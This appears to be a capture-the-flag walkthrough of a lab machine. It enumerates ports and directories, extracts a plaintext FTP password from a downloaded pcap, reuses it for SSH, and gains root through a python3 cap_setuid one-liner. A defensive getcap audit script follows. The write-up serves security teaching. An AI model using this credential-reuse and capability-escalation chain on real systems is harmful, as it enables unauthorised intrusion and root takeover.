Enumeration
nmap -sV 10.129.228.42
Port 80 is open. Let's check it by entering the IP address in our browser.
gobuster dir -w /usr/share/dirb/wordlists/common.txt -u 10.129.228.42
Now let's open our browser again and check:
10.129.228.42/data
10.129.228.42/ip
10.129.228.42/netstat
10.129.228.42/data seems interesting. I tried several combinations but found something interesting with 10.129.228.42/data/0
If you type 10.129.228.42/data/0 in your browser, you find a file to download.
Download the file. It is called 0.pcap.
Looks like a pcap file, so let's open Wireshark and look more into it.
On the Parrot machine, go to Applications --> Pentesting --> Sniffing and Spoofing --> Wireshark.
Once Wireshark loads, click on File --> Open.
Locate your 0.pcap file and click on Open.
In the filter field, type FTP to show only FTP traffic. FTP sends its USER and PASS commands unencrypted, so we can see the password used by Nathan in plaintext!
Foothold
We know that SSH is open too, so let's try that:
ssh nathan@10.129.228.42
You are prompted to enter a password. Enter the password we just found.
The credentials worked, which means the FTP password is reused for SSH, and we are in.
ls
cat user.txt
You got your flag!
Privilege Escalation
id
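getcap -r / 2>/dev/null
This lists every file that carries Linux file capabilities. The next command works for an unprivileged user only if the python3 binary has the cap_setuid capability, which lets the process change its UID to 0:
python3 -c 'import os; os.setuid(0); os.system("/bin/bash")'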
Now we are root!
id
ls
cd /root
ls
cat root.txt
Now we got the root flag too!
Congratulations!
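The getcap step above is also the check an administrator can run to find this weakness before anyone else does. The script below is an added example, not part of the original write-up: it reads getcap output and flags files whose capabilities allow a direct jump to root. The function name, the capability list and every sample line are assumptions made for the illustration.

```shell
#!/usr/bin/env bash
# Added example: audit `getcap -r /` output for capabilities that lead to root.
# The capability list and all sample lines below are constructed assumptions.

RISKY='cap_setuid cap_setgid cap_sys_admin cap_dac_override cap_dac_read_search cap_sys_ptrace cap_sys_module cap_chown cap_fowner'

# Reads getcap output on stdin, prints "path<TAB>capability" for each risky grant.
# Handles both layouts: "path = caps+flags" (older libcap) and "path caps=flags".
# Assumes paths contain no spaces.
flag_risky_caps() {
  awk -v risky="$RISKY" '
    BEGIN { n = split(risky, r, " "); for (i = 1; i <= n; i++) bad[r[i]] = 1 }
    {
      for (f = 2; f <= NF; f++) {
        clause = $f
        if (clause == "=") continue            # separator in the older layout
        pos = match(clause, /[+=][eip]+$/)     # start of the flag suffix
        if (pos == 0) continue
        flags = substr(clause, pos + 1)
        names = substr(clause, 1, pos - 1)
        if (flags !~ /[ep]/) continue          # inheritable-only grants are skipped
        if (names == "") { print $1 "\tALL"; continue }   # "=ep" grants everything
        m = split(names, c, ",")
        for (j = 1; j <= m; j++) if (c[j] in bad) print $1 "\t" c[j]
      }
    }'
}

# Constructed sample of getcap output mixing both layouts.
sample_getcap() {
  cat <<'EOF'
/usr/bin/python3 = cap_setuid,cap_net_bind_service+eip
/usr/bin/ping = cap_net_raw+ep
/usr/bin/mtr-packet cap_net_raw=ep
/opt/tool/helper =ep
/usr/bin/perl cap_setuid=i
EOF
}

sample_getcap | flag_risky_caps
```

On a real host, pipe `getcap -r / 2>/dev/null` into flag_risky_caps and remove any flagged capability that is not needed with `setcap -r <path>`.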